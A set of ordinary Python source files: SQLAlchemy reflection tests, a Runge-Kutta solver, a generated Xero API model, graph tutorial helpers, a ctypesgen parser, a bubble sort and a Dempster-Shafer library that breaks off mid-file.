query = "CREATE VIEW %s AS SELECT * FROM %s" % (view_name, fullname)
con.execute(sa.sql.text(query))
@testing.requires.views
def _drop_views(con, schema=None):
for table_name in ("email_addresses", "users"):
fullname = table_name
if schema:
fullname = "%s.%s" % (schema, table_name)
view_name = fullname + "_v"
query = "DROP VIEW %s" % view_name
con.execute(sa.sql.text(query))
class ReverseCasingReflectTest(fixtures.TestBase, AssertsCompiledSQL):
__dialect__ = "default"
__backend__ = True
@testing.requires.denormalized_names
def setup(self):
testing.db.execute(
"""
CREATE TABLE weird_casing(
col1 char(20),
"Col2" char(20),
"col3" char(20)
)
"""
)
@testing.requires.denormalized_names
def teardown(self):
testing.db.execute("drop table weird_casing")
@testing.requires.denormalized_names
def test_direct_quoting(self):
m = MetaData(testing.db)
t = Table("weird_casing", m, autoload=True)
self.assert_compile(
t.select(),
"SELECT weird_casing.col1, "
'weird_casing."Col2", weird_casing."col3" '
"FROM weird_casing",
)
class CaseSensitiveTest(fixtures.TablesTest):
"""Nail down case sensitive behaviors, mostly on MySQL."""
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"SomeTable",
metadata,
Column("x", Integer, primary_key=True),
test_needs_fk=True,
)
Table(
"SomeOtherTable",
metadata,
Column("x", Integer, primary_key=True),
Column("y", Integer, sa.ForeignKey("SomeTable.x")),
test_needs_fk=True,
)
@testing.fails_if(testing.requires._has_mysql_on_windows)
def test_table_names(self):
x = testing.db.run_callable(testing.db.dialect.get_table_names)
assert set(["SomeTable", "SomeOtherTable"]).issubset(x)
def test_reflect_exact_name(self):
m = MetaData()
t1 = Table("SomeTable", m, autoload=True, autoload_with=testing.db)
eq_(t1.name, "SomeTable")
assert t1.c.x is not None
@testing.fails_if(
lambda: testing.against(("mysql", "<", (5, 5)))
and not testing.requires._has_mysql_fully_case_sensitive()
)
def test_reflect_via_fk(self):
m = MetaData()
t2 = Table(
"SomeOtherTable", m, autoload=True, autoload_with=testing.db
)
eq_(t2.name, "SomeOtherTable")
assert "SomeTable" in m.tables
@testing.fails_if(testing.requires._has_mysql_fully_case_sensitive)
@testing.fails_on_everything_except("sqlite", "mysql", "mssql")
def test_reflect_case_insensitive(self):
m = MetaData()
t2 = Table("sOmEtAbLe", m, autoload=True, autoload_with=testing.db)
eq_(t2.name, "sOmEtAbLe")
class ColumnEventsTest(fixtures.RemovesEvents, fixtures.TestBase):
__backend__ = True
@classmethod
def setup_class(cls):
cls.metadata = MetaData()
cls.to_reflect = Table(
"to_reflect",
cls.metadata,
Column("x", sa.Integer, primary_key=True),
Column("y", sa.Integer),
test_needs_fk=True,
)
cls.related = Table(
"related",
cls.metadata,
Column("q", sa.Integer, sa.ForeignKey("to_reflect.x")),
test_needs_fk=True,
)
sa.Index("some_index", cls.to_reflect.c.y)
cls.metadata.create_all(testing.db)
@classmethod
def teardown_class(cls):
cls.metadata.drop_all(testing.db)
def _do_test(self, col, update, assert_, tablename="to_reflect"):
# load the actual Table class, not the test
# wrapper
from sqlalchemy.schema import Table
m = MetaData(testing.db)
def column_reflect(insp, table, column_info):
if column_info["name"] == col:
column_info.update(update)
t = Table(
tablename,
m,
autoload=True,
listeners=[("column_reflect", column_reflect)],
)
assert_(t)
m = MetaData(testing.db)
self.event_listen(Table, "column_reflect", column_reflect)
t2 = Table(tablename, m, autoload=True)
assert_(t2)
def test_override_key(self):
def assertions(table):
eq_(table.c.YXZ.name, "x")
eq_(set(table.primary_key), set([table.c.YXZ]))
self._do_test("x", {"key": "YXZ"}, assertions)
def test_override_index(self):
def assertions(table):
idx = list(table.indexes)[0]
eq_(idx.columns, [table.c.YXZ])
self._do_test("y", {"key": "YXZ"}, assertions)
def test_override_key_fk(self):
m = MetaData(testing.db)
def column_reflect(insp, table, column_info):
if column_info["name"] == "q":
column_info["key"] = "qyz"
elif column_info["name"] == "x":
column_info["key"] = "xyz"
to_reflect = Table(
"to_reflect",
m,
autoload=True,
listeners=[("column_reflect", column_reflect)],
)
related = Table(
"related",
m,
autoload=True,
listeners=[("column_reflect", column_reflect)],
)
assert related.c.qyz.references(to_reflect.c.xyz)
def test_override_type(self):
def assert_(table):
assert isinstance(table.c.x.type, sa.String)
self._do_test("x", {"type": sa.String}, assert_)
def test_override_info(self):
self._do_test(
"x",
{"info": {"a": "b"}},
lambda table: eq_(table.c.x.info, {"a": "b"}),
)
def test_override_server_default_fetchedvalue(self):
my_default = FetchedValue()
self._do_test(
"x",
{"default": my_default},
lambda table: eq_(table.c.x.server_default, my_default),
)
def test_override_server_default_default_clause(self):
my_default = DefaultClause("1")
self._do_test(
"x",
{"default": my_default},
lambda table: eq_(table.c.x.server_default, my_default),
)
def test_override_server_default_plain_text(self):
my_default = "1"
def assert_text_of_one(table):
is_true(
isinstance(
table.c.x.server_default.arg, sql.elements.TextClause
)
)
eq_(str(table.c.x.server_default.arg), "1")
self._do_test("x", {"default": my_default}, assert_text_of_one)
def test_override_server_default_textclause(self):
my_default = sa.text("1")
def assert_text_of_one(table):
is_true(
isinstance(
table.c.x.server_default.arg, sql.elements.TextClause
)
)
eq_(str(table.c.x.server_default.arg), "1")
self._do_test("x", {"default": my_default}, assert_text_of_one)
|
py | b414e1939d5543f2c1d3da17d9ff1f5ced06ae04 | # this is the second order two stage method
# it is your choice as to what the parameter alpha is
# refer to https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
# numpy for mathematical operations and working with states
import numpy as np
def gen_2(func, y_n, t_step, t_n, alpha = .5):
# this is a single step generalized 2 stage, 2nd order solver
# automatically set to the midpoint method, adjust alpha for more
# rename some stuff
a = alpha
h = t_step
# determine the stage components
k1 = func(t_n, y_n)
k2 = func(t_n + a*h, y_n + a*h*k1)
# perform the step
y_np1 = y_n + h*((1-(1/(2*a)))*k1 + (1/(2*a))*k2)
# return the next step
return y_np1
def gen_2_mul(func, y_n, t_step, t_span, alpha = .5):
# this is a multi step generalized 2 stage, 2nd order solver
# automatically set to midpoint method, adjust alpha for more
# rename things
a = alpha
h = t_step
# create a set of the times
t_set = np.linspace(t_span[0], t_span[1], (t_span[1]-t_span[0])/t_step)
# iterate through the time set
for t in t_set:
y_n = gen_2(func, y_n, t_step, t, alpha)
# return the new state
return y_n |
py | b414e2235d56353a80b8c7825a338a4a35d00831 | # coding: utf-8
"""
Accounting API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: 2.3.4
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
from xero_python.models import BaseModel
class OnlineInvoices(BaseModel):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"online_invoices": "list[OnlineInvoice]"}
attribute_map = {"online_invoices": "OnlineInvoices"}
def __init__(self, online_invoices=None): # noqa: E501
"""OnlineInvoices - a model defined in OpenAPI""" # noqa: E501
self._online_invoices = None
self.discriminator = None
if online_invoices is not None:
self.online_invoices = online_invoices
@property
def online_invoices(self):
"""Gets the online_invoices of this OnlineInvoices. # noqa: E501
:return: The online_invoices of this OnlineInvoices. # noqa: E501
:rtype: list[OnlineInvoice]
"""
return self._online_invoices
@online_invoices.setter
def online_invoices(self, online_invoices):
"""Sets the online_invoices of this OnlineInvoices.
:param online_invoices: The online_invoices of this OnlineInvoices. # noqa: E501
:type: list[OnlineInvoice]
"""
self._online_invoices = online_invoices
|
py | b414e24d11368b131631819e17f5072f2b2b35a9 | # Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Helper functions for tutorial.
"""
from builtins import range
from graphillion import GraphSet
from random import seed, shuffle
def grid(m, n=None, prob_to_remove_edge=0.0):
import networkx as nx
# critical edge probability is 0.5 in the percolation theory
assert 0 <= prob_to_remove_edge and prob_to_remove_edge < 0.4
seed(1)
m += 1
if n is None:
n = m
else:
n += 1
edges = []
for v in range(1, m * n + 1):
if v % n != 0:
edges.append((v, v + 1))
if v <= (m - 1) * n:
edges.append((v, v + n))
g = nx.Graph(edges)
while prob_to_remove_edge > 0:
g = nx.Graph(edges)
edges_removed = edges[:]
shuffle(edges_removed)
g.remove_edges_from(edges_removed[:int(len(edges)*prob_to_remove_edge)])
if nx.is_connected(g) and len(g[1]) == 2:
break
return g.edges()
def draw(g, universe=None):
import networkx as nx
import matplotlib.pyplot as plt
if not isinstance(g, nx.Graph):
g = nx.Graph(list(g))
if universe is None:
universe = GraphSet.universe()
if not isinstance(universe, nx.Graph):
universe = nx.Graph(list(universe))
n = sorted(universe[1].keys())[1] - 1
m = universe.number_of_nodes() // n
g.add_nodes_from(universe.nodes())
pos = {}
for v in range(1, m * n + 1):
pos[v] = ((v - 1) % n, (m * n - v) // n)
nx.draw(g, pos)
plt.show()
def how_many_turns(path):
path = set(path)
turns = 0
pos = 1
direction = 1
while (True):
edges = [e for e in path if e[0] == pos or e[1] == pos]
if not edges: break
edge = edges[0]
path -= set([edge])
next_direction = abs(edge[1] - edge[0])
if direction != next_direction:
turns +=1
pos = edge[1] if edge[0] == pos else edge[0]
direction = next_direction
return turns
def hist(data):
import matplotlib.pyplot as plt
plt.hist(data)
plt.show()
|
py | b414e2c3289c262be8bde2994e406ec8ce1315c9 | #!/usr/bin/env python
"""
DataCollectingParser subclasses ctypesparser.CtypesParser and builds Description
objects from the CtypesType objects and other information from CtypesParser.
After parsing is complete, a DescriptionCollection object can be retrieved by
calling DataCollectingParser.data().
"""
import os
from tempfile import mkstemp
from ctypesgen.ctypedescs import CtypesEnum, CtypesType, CtypesTypeVisitor
from ctypesgen.descriptions import (
ConstantDescription,
DescriptionCollection,
EnumDescription,
FunctionDescription,
MacroDescription,
StructDescription,
TypedefDescription,
UndefDescription,
VariableDescription,
)
from ctypesgen.expressions import ConstantExpressionNode
from ctypesgen.messages import error_message, status_message
from ctypesgen.parser import ctypesparser
class DataCollectingParser(ctypesparser.CtypesParser, CtypesTypeVisitor):
"""Main class for the Parser component. Steps for use:
p=DataCollectingParser(names_of_header_files,options)
p.parse()
data=p.data() #A dictionary of constants, enums, structs, functions, etc.
"""
def __init__(self, headers, options):
super(DataCollectingParser, self).__init__(options)
self.headers = headers
self.options = options
self.constants = []
self.typedefs = []
self.structs = []
self.enums = []
self.functions = []
self.variables = []
self.macros = []
self.all = []
self.output_order = []
# NULL is a useful macro to have defined
null = ConstantExpressionNode(None)
nullmacro = ConstantDescription("NULL", null, ("<built-in>", 1))
self.constants.append(nullmacro)
self.all.append(nullmacro)
self.output_order.append(("constant", nullmacro))
# A list of tuples describing macros; saved to be processed after
# everything else has been parsed
self.saved_macros = []
# A set of structs that are already known
self.already_seen_structs = set()
# A dict of structs that have only been seen in opaque form
self.already_seen_opaque_structs = {}
# A set of enums that are already known
self.already_seen_enums = set()
# A dict of enums that have only been seen in opaque form
self.already_seen_opaque_enums = {}
def parse(self):
fd, fname = mkstemp(suffix=".h")
with os.fdopen(fd, "w") as f:
for header in self.options.other_headers:
f.write("#include <%s>\n" % header)
for header in self.headers:
f.write('#include "%s"\n' % os.path.abspath(header))
f.flush()
try:
super(DataCollectingParser, self).parse(fname, self.options.debug_level)
finally:
os.unlink(fname)
for name, params, expr, (filename, lineno) in self.saved_macros:
self.handle_macro(name, params, expr, filename, lineno)
def handle_define_constant(self, name, expr, filename, lineno):
# Called by CParser
# Save to handle later
self.saved_macros.append((name, None, expr, (filename, lineno)))
def handle_define_unparseable(self, name, params, value, filename, lineno):
# Called by CParser
if params:
original_string = "#define %s(%s) %s" % (name, ",".join(params), " ".join(value))
else:
original_string = "#define %s %s" % (name, " ".join(value))
macro = MacroDescription(name, params, None, src=(filename, lineno))
macro.error('Could not parse macro "%s"' % original_string, cls="macro")
macro.original_string = original_string
self.macros.append(macro)
self.all.append(macro)
self.output_order.append(("macro", macro))
def handle_define_macro(self, name, params, expr, filename, lineno):
# Called by CParser
# Save to handle later
self.saved_macros.append((name, params, expr, (filename, lineno)))
def handle_undefine(self, macro, filename, lineno):
# save to handle later to get order correct
self.saved_macros.append(("#undef", None, macro, (filename, lineno)))
def handle_ctypes_typedef(self, name, ctype, filename, lineno):
# Called by CtypesParser
ctype.visit(self)
typedef = TypedefDescription(name, ctype, src=(filename, repr(lineno)))
self.typedefs.append(typedef)
self.all.append(typedef)
self.output_order.append(("typedef", typedef))
def handle_ctypes_new_type(self, ctype, filename, lineno):
# Called by CtypesParser
if isinstance(ctype, CtypesEnum):
self.handle_enum(ctype, filename, lineno)
else:
self.handle_struct(ctype, filename, lineno)
def handle_ctypes_function(
self, name, restype, argtypes, errcheck, variadic, attrib, filename, lineno
):
# Called by CtypesParser
restype.visit(self)
for argtype in argtypes:
argtype.visit(self)
function = FunctionDescription(
name, restype, argtypes, errcheck, variadic, attrib, src=(filename, repr(lineno))
)
self.functions.append(function)
self.all.append(function)
self.output_order.append(("function", function))
def handle_ctypes_variable(self, name, ctype, filename, lineno):
# Called by CtypesParser
ctype.visit(self)
variable = VariableDescription(name, ctype, src=(filename, repr(lineno)))
self.variables.append(variable)
self.all.append(variable)
self.output_order.append(("variable", variable))
def handle_struct(self, ctypestruct, filename, lineno):
# Called from within DataCollectingParser
# When we find an opaque struct, we make a StructDescription for it
# and record it in self.already_seen_opaque_structs. If we later
# find a transparent struct with the same tag, we fill in the
# opaque struct with the information from the transparent struct and
# move the opaque struct to the end of the struct list.
name = "%s %s" % (ctypestruct.variety, ctypestruct.tag)
if name in self.already_seen_structs:
return
if ctypestruct.opaque:
if name not in self.already_seen_opaque_structs:
struct = StructDescription(
ctypestruct.tag,
ctypestruct.attrib,
ctypestruct.variety,
None, # No members
True, # Opaque
ctypestruct,
src=(filename, str(lineno)),
)
self.already_seen_opaque_structs[name] = struct
self.structs.append(struct)
self.all.append(struct)
self.output_order.append(("struct", struct))
else:
for (membername, ctype) in ctypestruct.members:
ctype.visit(self)
if name in self.already_seen_opaque_structs:
# Fill in older version
struct = self.already_seen_opaque_structs[name]
struct.opaque = False
struct.members = ctypestruct.members
struct.ctype = ctypestruct
struct.src = ctypestruct.src
self.output_order.append(("struct-body", struct))
del self.already_seen_opaque_structs[name]
else:
struct = StructDescription(
ctypestruct.tag,
ctypestruct.attrib,
ctypestruct.variety,
ctypestruct.members,
False, # Not opaque
src=(filename, str(lineno)),
ctype=ctypestruct,
)
self.structs.append(struct)
self.all.append(struct)
self.output_order.append(("struct", struct))
self.output_order.append(("struct-body", struct))
self.already_seen_structs.add(name)
def handle_enum(self, ctypeenum, filename, lineno):
# Called from within DataCollectingParser.
# Process for handling opaque enums is the same as process for opaque
# structs. See handle_struct() for more details.
tag = ctypeenum.tag
if tag in self.already_seen_enums:
return
if ctypeenum.opaque:
if tag not in self.already_seen_opaque_enums:
enum = EnumDescription(ctypeenum.tag, None, ctypeenum, src=(filename, str(lineno)))
enum.opaque = True
self.already_seen_opaque_enums[tag] = enum
self.enums.append(enum)
self.all.append(enum)
self.output_order.append(("enum", enum))
else:
if tag in self.already_seen_opaque_enums:
# Fill in older opaque version
enum = self.already_seen_opaque_enums[tag]
enum.opaque = False
enum.ctype = ctypeenum
enum.src = ctypeenum.src
enum.members = ctypeenum.enumerators
del self.already_seen_opaque_enums[tag]
else:
enum = EnumDescription(
ctypeenum.tag,
ctypeenum.enumerators,
src=(filename, str(lineno)),
ctype=ctypeenum,
)
enum.opaque = False
self.enums.append(enum)
self.all.append(enum)
self.output_order.append(("enum", enum))
self.already_seen_enums.add(tag)
for (enumname, expr) in ctypeenum.enumerators:
constant = ConstantDescription(enumname, expr, src=(filename, lineno))
self.constants.append(constant)
self.all.append(constant)
self.output_order.append(("constant", constant))
def handle_macro(self, name, params, expr, filename, lineno):
# Called from within DataCollectingParser
src = (filename, lineno)
if expr is None:
expr = ConstantExpressionNode(True)
constant = ConstantDescription(name, expr, src)
self.constants.append(constant)
self.all.append(constant)
return
expr.visit(self)
if isinstance(expr, CtypesType):
if params:
macro = MacroDescription(name, "", src)
macro.error(
"%s has parameters but evaluates to a type. "
"Ctypesgen does not support it." % macro.casual_name(),
cls="macro",
)
self.macros.append(macro)
self.all.append(macro)
self.output_order.append(("macro", macro))
else:
typedef = TypedefDescription(name, expr, src)
self.typedefs.append(typedef)
self.all.append(typedef)
self.output_order.append(("typedef", typedef))
elif name == "#undef":
undef = UndefDescription(expr, src)
self.all.append(undef)
self.output_order.append(("undef", undef))
else:
macro = MacroDescription(name, params, expr, src)
self.macros.append(macro)
self.all.append(macro)
self.output_order.append(("macro", macro))
# Macros could possibly contain things like __FILE__, __LINE__, etc...
# This could be supported, but it would be a lot of work. It would
# probably also bloat the Preamble considerably.
def handle_error(self, message, filename, lineno):
# Called by CParser
error_message("%s:%d: %s" % (filename, lineno, message), cls="cparser")
def handle_pp_error(self, message):
# Called by PreprocessorParser
error_message("%s: %s" % (self.options.cpp, message), cls="cparser")
def handle_status(self, message):
# Called by CParser
status_message(message)
def visit_struct(self, struct):
self.handle_struct(struct, struct.src[0], struct.src[1])
def visit_enum(self, enum):
self.handle_enum(enum, enum.src[0], enum.src[1])
def data(self):
return DescriptionCollection(
self.constants,
self.typedefs,
self.structs,
self.enums,
self.functions,
self.variables,
self.macros,
self.all,
self.output_order,
)
|
py | b414e46ee2ebcc91c92bfe8524a79ebffe5833a7 | from Swap import _swap
def bubble_sort(unsorted):
"""
Does a bubble sort given a Python list
Expected Complexity: O(n^2) (time) and O(1) (space)
:param unsorted: unsorted Python list to be sorted
"""
for i in range(len(unsorted) - 1):
for j in range(0, len(unsorted) - i - 1):
# bubbles up the largest value through the list
if unsorted[j] > unsorted[j + 1]:
_swap(unsorted, j, j + 1)
|
py | b414e52841b6eaae7938999079f58c4e4c943493 | """
A framework for performing computations in the Dempster-Shafer theory.
"""
from __future__ import print_function
from itertools import chain, combinations
from functools import partial, reduce
from operator import mul
from math import log, fsum, sqrt, factorial
from random import random, shuffle, uniform
import sys
try:
import numpy
try:
from scipy.stats import chi2
from scipy.optimize import fmin_cobyla
except:
print('SciPy not found: some features will not work.', file=sys.stderr)
except:
print('NumPy not found: some features will not work.', file=sys.stderr)
class MassFunction(dict):
"""
A Dempster-Shafer mass function (basic probability assignment) based on a dictionary.
Both normalized and unnormalized mass functions are supported.
The underlying frame of discernment is assumed to be discrete.
Hypotheses and their associated mass values can be added/changed/removed using the standard dictionary methods.
Each hypothesis can be an arbitrary sequence which is automatically converted to a 'frozenset', meaning its elements must be hashable.
"""
def __init__(self, source=None):
"""
Creates a new mass function.
If 'source' is not None, it is used to initialize the mass function.
It can either be a dictionary mapping hypotheses to non-negative mass values
or an iterable containing tuples consisting of a hypothesis and a corresponding mass value.
"""
if source != None:
if isinstance(source, dict):
source = source.items()
for (h, v) in source:
self[h] += v
@staticmethod
def _convert(hypothesis):
"""Convert hypothesis to a 'frozenset' in order to make it hashable."""
if isinstance(hypothesis, frozenset):
return hypothesis
else:
return frozenset(hypothesis)
@staticmethod
def gbt(likelihoods, normalization=True, sample_count=None):
"""
Constructs a mass function using the generalized Bayesian theorem.
For more information, see Smets. 1993. Belief functions:
The disjunctive rule of combination and the generalized Bayesian theorem. International Journal of Approximate Reasoning.
'likelihoods' specifies the conditional plausibilities for a set of singleton hypotheses.
It can either be a dictionary mapping singleton hypotheses to plausibilities or an iterable
containing tuples consisting of a singleton hypothesis and a corresponding plausibility value.
'normalization' determines whether the resulting mass function is normalized, i.e., whether m({}) == 0.
If 'sample_count' is not None, the true mass function is approximated using the specified number of samples.
"""
m = MassFunction()
if isinstance(likelihoods, dict):
likelihoods = list(likelihoods.items())
# filter trivial likelihoods 0 and 1
ones = [h for (h, l) in likelihoods if l >= 1.0]
likelihoods = [(h, l) for (h, l) in likelihoods if 0.0 < l < 1.0]
if sample_count == None: # deterministic
def traverse(m, likelihoods, ones, index, hyp, mass):
if index == len(likelihoods):
m[hyp + ones] = mass
else:
traverse(m, likelihoods, ones, index + 1, hyp + [likelihoods[index][0]], mass * likelihoods[index][1])
traverse(m, likelihoods, ones, index + 1, hyp, mass * (1.0 - likelihoods[index][1]))
traverse(m, likelihoods, ones, 0, [], 1.0)
if normalization:
m.normalize()
else: # Monte-Carlo
if normalization:
empty_mass = reduce(mul, [1.0 - l[1] for l in likelihoods], 1.0)
for _ in range(sample_count):
rv = [random() for _ in range(len(likelihoods))]
subtree_mass = 1.0
hyp = set(ones)
for k in range(len(likelihoods)):
l = likelihoods[k][1]
p_t = l * subtree_mass
p_f = (1.0 - l) * subtree_mass
if normalization and not hyp: # avoid empty hypotheses in the normalized case
p_f -= empty_mass
if p_t > rv[k] * (p_t + p_f):
hyp.add(likelihoods[k][0])
else:
subtree_mass *= 1 - l # only relevant for the normalized empty case
m[hyp] += 1.0 / sample_count
return m
@staticmethod
def from_bel(bel):
"""
Creates a mass function from a corresponding belief function.
'bel' is a dictionary mapping hypotheses to belief values (like the dictionary returned by 'bel(None)').
"""
m = MassFunction()
for h1 in bel.keys():
v = fsum([bel[h2] * (-1)**(len(h1 - h2)) for h2 in powerset(h1)])
if v > 0:
m[h1] = v
mass_sum = fsum(m.values())
if mass_sum < 1.0:
m[frozenset()] = 1.0 - mass_sum
return m
@staticmethod
def from_pl(pl):
"""
Creates a mass function from a corresponding plausibility function.
'pl' is a dictionary mapping hypotheses to plausibility values (like the dictionary returned by 'pl(None)').
"""
frame = max(pl.keys(), key=len)
bel_theta = pl[frame]
bel = {frozenset(frame - h):bel_theta - v for (h, v) in pl.items()} # follows from bel(-A) = bel(frame) - pl(A)
return MassFunction.from_bel(bel)
@staticmethod
def from_q(q):
"""
Creates a mass function from a corresponding commonality function.
'q' is a dictionary mapping hypotheses to commonality values (like the dictionary returned by 'q(None)').
"""
m = MassFunction()
frame = max(q.keys(), key=len)
for h1 in q.keys():
v = fsum([q[h1 | h2] * (-1)**(len(h2 - h1)) for h2 in powerset(frame - h1)])
if v > 0:
m[h1] = v
mass_sum = fsum(m.values())
if mass_sum < 1.0:
m[frozenset()] = 1.0 - mass_sum
return m
def __missing__(self, key):
"""Return 0 mass for hypotheses that are not contained."""
return 0.0
def __copy__(self):
c = MassFunction()
for k, v in self.items():
c[k] = v
return c
def copy(self):
"""Creates a shallow copy of the mass function."""
return self.__copy__()
def __contains__(self, hypothesis):
return dict.__contains__(self, MassFunction._convert(hypothesis))
def __getitem__(self, hypothesis):
return dict.__getitem__(self, MassFunction._convert(hypothesis))
def __setitem__(self, hypothesis, value):
"""
Adds or updates the mass value of a hypothesis.
'hypothesis' is automatically converted to a 'frozenset' meaning its elements must be hashable.
In case of a negative mass value, a ValueError is raised.
"""
if value < 0.0:
raise ValueError("mass value is negative: %f" % value)
dict.__setitem__(self, MassFunction._convert(hypothesis), value)
def __delitem__(self, hypothesis):
return dict.__delitem__(self, MassFunction._convert(hypothesis))
def frame(self):
"""
Returns the frame of discernment of the mass function as a 'frozenset'.
The frame of discernment is the union of all contained hypotheses.
In case the mass function does not contain any hypotheses, an empty set is returned.
"""
if not self:
return frozenset()
else:
return frozenset.union(*self.keys())
def singletons(self):
"""
Returns the set of all singleton hypotheses.
Like 'frame()', except that each singleton is wrapped in a frozenset
and can thus be directly passed to methods like 'bel()'.
"""
return {frozenset((s,)) for s in self.frame()}
def focal(self):
"""
Returns the set of all focal hypotheses.
A focal hypothesis has a mass value greater than 0.
"""
return {h for (h, v) in self.items() if v > 0}
def core(self, *mass_functions):
"""
Returns the core of one or more mass functions as a 'frozenset'.
The core of a single mass function is the union of all its focal hypotheses.
In case a mass function does not contain any focal hypotheses, its core is an empty set.
If multiple mass functions are given, their combined core (intersection of all single cores) is returned.
"""
if mass_functions:
return frozenset.intersection(self.core(), *[m.core() for m in mass_functions])
else:
focal = self.focal()
if not focal:
return frozenset()
else:
return frozenset.union(*focal)
def all(self):
"""Returns an iterator over all subsets of the frame of discernment, including the empty set."""
return powerset(self.frame())
def bel(self, hypothesis=None):
"""
Computes either the belief of 'hypothesis' or the entire belief function (hypothesis=None).
If 'hypothesis' is None (default), a dictionary mapping hypotheses to their respective belief values is returned.
Otherwise, the belief of 'hypothesis' is returned.
In this case, 'hypothesis' is automatically converted to a 'frozenset' meaning its elements must be hashable.
"""
if hypothesis is None:
return {h:self.bel(h) for h in powerset(self.core())}
else:
hypothesis = MassFunction._convert(hypothesis)
if not hypothesis:
return 0.0
else:
return fsum([v for (h, v) in self.items() if h and hypothesis.issuperset(h)])
def pl(self, hypothesis=None):
"""
Computes either the plausibility of 'hypothesis' or the entire plausibility function (hypothesis=None).
If 'hypothesis' is None (default), a dictionary mapping hypotheses to their respective plausibility values is returned.
Otherwise, the plausibility of 'hypothesis' is returned.
In this case, 'hypothesis' is automatically converted to a 'frozenset' meaning its elements must be hashable.
"""
if hypothesis is None:
return {h:self.pl(h) for h in powerset(self.core())}
else:
hypothesis = MassFunction._convert(hypothesis)
if not hypothesis:
return 0.0
else:
return fsum([v for (h, v) in self.items() if hypothesis & h])
def q(self, hypothesis=None):
"""
Computes either the commonality of 'hypothesis' or the entire commonality function (hypothesis=None).
If 'hypothesis' is None (default), a dictionary mapping hypotheses to their respective commonality values is returned.
Otherwise, the commonality of 'hypothesis' is returned.
In this case, 'hypothesis' is automatically converted to a 'frozenset' meaning its elements must be hashable.
"""
if hypothesis is None:
return {h:self.q(h) for h in powerset(self.core())}
else:
if not hypothesis:
return 1.0
else:
return fsum([v for (h, v) in self.items() if h.issuperset(hypothesis)])
def __and__(self, mass_function):
"""Shorthand for 'combine_conjunctive(mass_function)'."""
return self.combine_conjunctive(mass_function)
def __or__(self, mass_function):
"""Shorthand for 'combine_disjunctive(mass_function)'."""
return self.combine_disjunctive(mass_function)
def __str__(self):
hyp = sorted([(v, h) for (h, v) in self.items()], reverse=True)
return "{" + "; ".join([str(set(h)) + ":" + str(v) for (v, h) in hyp]) + "}"
def __mul__(self, scalar):
if not isinstance(scalar, float):
raise TypeError('Can only multiply by a float value.')
m = MassFunction()
for (h, v) in self.items():
m[h] = v * scalar
return m
def __rmul__(self, scalar):
return self.__mul__(scalar)
def __add__(self, m):
if not isinstance(m, MassFunction):
raise TypeError('Can only add two mass functions.')
result = self.copy()
for (h, v) in m.items():
result[h] += v
return result
def weight_function(self):
"""
Computes the weight function corresponding to this mass function.
"""
weights = dict()
q = self.q()
theta = self.frame()
for h in powerset(theta):
if len(h) < len(theta): # weight is undefined for theta
sets = [h | c for c in powerset(theta - h)]
q_even = reduce(mul, [q[h2] for h2 in sets if len(h2) % 2 == 0], 1.0)
q_odd = reduce(mul, [q[h2] for h2 in sets if len(h2) % 2 == 1], 1.0)
if len(h) % 2 == 0:
weights[h] = q_odd / q_even
else:
weights[h] = q_even / q_odd
return weights
def combine_conjunctive(self, mass_function, normalization=True, sample_count=None, importance_sampling=False):
"""
Conjunctively combines the mass function with another mass function and returns the combination as a new mass function.
The other mass function is assumed to be defined over the same frame of discernment.
If 'mass_function' is not of type MassFunction, it is assumed to be an iterable containing multiple mass functions that are iteratively combined.
If the mass functions are flatly contracting or if one of the mass functions is empty, an empty mass function is returned.
'normalization' determines whether the resulting mass function is normalized (default is True).
If 'sample_count' is not None, the true combination is approximated using the specified number of samples.
In this case, 'importance_sampling' determines the method of approximation (only if normalization=True, otherwise 'importance_sampling' is ignored).
The default method (importance_sampling=False) independently generates samples from both mass functions and computes their intersections.
If importance_sampling=True, importance sampling is used to avoid empty intersections, which leads to a lower approximation error but is also slower.
This method should be used if there is significant evidential conflict between the mass functions.
"""
return self._combine(mass_function, rule=lambda s1, s2: s1 & s2, normalization=normalization, sample_count=sample_count, importance_sampling=importance_sampling)
def combine_disjunctive(self, mass_function, sample_count=None):
"""
Disjunctively combines the mass function with another mass function and returns the combination as a new mass function.
The other mass function is assumed to be defined over the same frame of discernment.
If 'mass_function' is not of type MassFunction, it is assumed to be an iterable containing multiple mass functions that are iteratively combined.
If 'sample_count' is not None, the true combination is approximated using the specified number of samples.
"""
return self._combine(mass_function, rule=lambda s1, s2: s1 | s2, normalization=False, sample_count=sample_count, importance_sampling=False)
def combine_cautious(self, mass_function):
"""
Combines the mass function with another mass function using the cautious rule and returns the combination as a new mass function.
For more details, see:
T. Denoeux (2008), "Conjunctive and disjunctive combination of belief functions induced by nondistinct bodies of evidence",
Artificial Intelligence 172, 234-264.
"""
w1 = self.weight_function()
w2 = mass_function.weight_function()
w_min = {h:min(w1[h], w2[h]) for h in w1}
theta = self.frame()
m = MassFunction({theta:1.0})
for h, w in w_min.items():
m_simple = MassFunction({theta:w, h:1.0 - w})
m = m.combine_conjunctive(m_simple, normalization=False)
return m
def combine_conjunctive_disjunctive(self, mass_function, sample_count= None):
"""Dubois-Prade combination; conjunctive for non-conflicting sets, disjunctive otherwise"""
